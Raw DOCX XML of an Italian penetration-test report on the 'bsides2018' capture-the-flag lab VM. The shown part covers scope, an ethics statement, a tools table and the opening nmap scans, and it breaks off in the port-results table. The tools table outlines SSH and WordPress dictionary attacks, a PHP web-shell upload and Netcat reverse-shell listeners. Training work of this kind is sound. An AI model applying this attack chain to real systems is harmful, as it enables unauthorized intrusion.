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mallCaps w:val="1"/>
          <w:color w:val="2e74b5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RELAZIONE TECNICA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:spacing w:after="120" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DI PENETRATION TESTING</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:color="2e74b5" w:space="0" w:sz="12" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="600" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valutazione della sicurezza del sistema target "bsides2018"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:before="1200" w:lineRule="auto"/>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1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bsides2018 VM (192.168.1.12)</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1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data attività: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">17 Luglio 2026</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Autore: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manuel Marchiotto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ambiente di test: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratorio virtualizzato (VirtualBox), rete isolata 192.168.1.0/24</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40" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introduzione</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 Scopo del test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il presente documento descrive l'attività di penetration testing condotta sul sistema target denominato "bsides2018", una macchina virtuale Linux ospitata in un ambiente di laboratorio isolato e controllato (rete 192.168.1.0/24, virtualizzata tramite Oracle VirtualBox). Lo scopo dell'attività è valutare il livello di sicurezza del sistema attraverso l'identificazione di vulnerabilità presenti a livello di rete, servizi esposti e applicazioni web, simulando le tecniche impiegate da un potenziale attaccante per ottenere un accesso non autorizzato e, successivamente, privilegi elevati (root) sul sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Obiettivi dell'attività</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gli obiettivi definiti per l'attività di test sono i seguenti:</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Identificare i servizi di rete esposti dal target e le relative versioni software, individuando eventuali componenti obsoleti o vulnerabili;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Enumerare l'applicazione web CMS WordPress individuata sul server, valutandone la configurazione e l'esposizione di informazioni sensibili;</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Ottenere un accesso iniziale (initial access) al sistema sfruttando le debolezze identificate;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Effettuare attività di post-exploitation ed enumerazione del sistema per individuare vettori di elevazione dei privilegi (privilege escalation);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Ottenere privilegi di amministratore (root) e validare il raggiungimento dell'obiettivo tramite acquisizione della flag finale;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Documentare l'intero processo e fornire raccomandazioni di rimedio per ciascuna vulnerabilità riscontrata.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Metodologia utilizzata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il test è stato condotto secondo un approccio black-box: all'inizio dell'attività non erano disponibili informazioni pregresse su credenziali, architettura applicativa o configurazione interna del sistema target, ad eccezione dell'indirizzo IP assegnato all'interno della rete di laboratorio. Il flusso operativo ha seguito le fasi tipiche di un penetration test, in linea con framework metodologici riconosciuti nel settore (es. PTES – Penetration Testing Execution Standard):</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Ricognizione e scansione (Information Gathering / Scanning);</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Enumerazione dei servizi e delle applicazioni esposte;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Sfruttamento delle vulnerabilità individuate (Exploitation) per l'ottenimento dell'accesso iniziale;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Attività di post-exploitation ed enumerazione interna del sistema;</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Escalation dei privilegi (Privilege Escalation);</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Raccolta delle evidenze finali e reportistica.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Strumenti impiegati</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Le attività sono state condotte utilizzando una distribuzione Kali Linux come piattaforma di attacco, unitamente ai seguenti strumenti:</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Strumento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Finalità</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2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap</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3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Scansione della rete e dei servizi (port scanning, service/version detection)</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024">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Client FTP</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025">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Verifica e accesso al servizio FTP esposto dal target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6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hydra</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7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tentativo di attacco a dizionario contro il servizio SSH</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028">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cURL</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029">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Interrogazione del servizio web e recupero di risorse (robots.txt, pagine)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A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WPScan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B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerazione dell'installazione WordPress, degli utenti e attacco a dizionario contro l'endpoint XML-RPC</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02C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Editor tema WordPress / Upload plugin</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02D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Caricamento di codice PHP malevolo (web shell) tramite pannello di amministrazione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E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Netcat (nc)</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F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Listener per la ricezione delle reverse shell (accesso iniziale e privilege escalation)</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030">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell Bash / strumenti nativi Linux</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031">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerazione del sistema, analisi di permessi, processi e crontab</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 Dichiarazione etica e ambito autorizzato</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'intera attività descritta nel presente documento è stata condotta esclusivamente all'interno di un ambiente di laboratorio virtualizzato, isolato dalla rete di produzione e privo di dati reali o di terze parti. Il sistema target "bsides2018" è una macchina virtuale didattica predisposta a scopo di formazione ed esercitazione in ambito cybersecurity (CTF – Capture The Flag). Nessuna delle tecniche, degli strumenti o dei comandi descritti in questo documento è stata impiegata contro sistemi non autorizzati. Il presente report ha finalità esclusivamente didattiche e di documentazione tecnica, in conformità ai principi dell'ethical hacking e del responsible testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Svolgimento delle attività</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nel presente capitolo viene descritto in dettaglio, fase per fase, il percorso tecnico seguito durante l'attività di penetration testing, con evidenza dei comandi eseguiti, degli output ottenuti e delle relative interpretazioni.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:color="1f3864" w:space="0" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Fase 1: Ricognizione e Scansione (Reconnaissance)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo della fase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Individuare gli host attivi all'interno della rete di laboratorio e, successivamente, mappare i servizi di rete esposti dal sistema target, identificandone versione software e potenziali punti deboli.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Strumenti utilizzati</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Nmap (Network Mapper) — host discovery, port scanning, service/version detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Procedura eseguita</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In primo luogo è stata eseguita una scansione ping-sweep sull'intera subnet di laboratorio per individuare gli host attivi:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>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5"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="940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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo nmap -sn 192.168.1.0/24</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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5334000" cy="2314575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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334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line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La scansione ha permesso di identificare tre host attivi: la macchina di attacco Kali Linux (192.168.1.10), il router/firewall pfSense (192.168.1.1) e il sistema target (192.168.1.12). Su quest'ultimo è stata quindi eseguita una scansione approfondita di tutte le porte TCP, con rilevamento di servizio e versione:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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color w:val="d4d4d4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo nmap -sS -sV -p- -T5 192.168.1.12</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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5334000" cy="17716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60" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati ottenuti</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Porta</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Servizio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Versione identificata</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47">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">21/tcp</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8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP</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9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">vsftpd 2.3.5</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04A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="202124"/>
                <w:sz w:val="20"/>
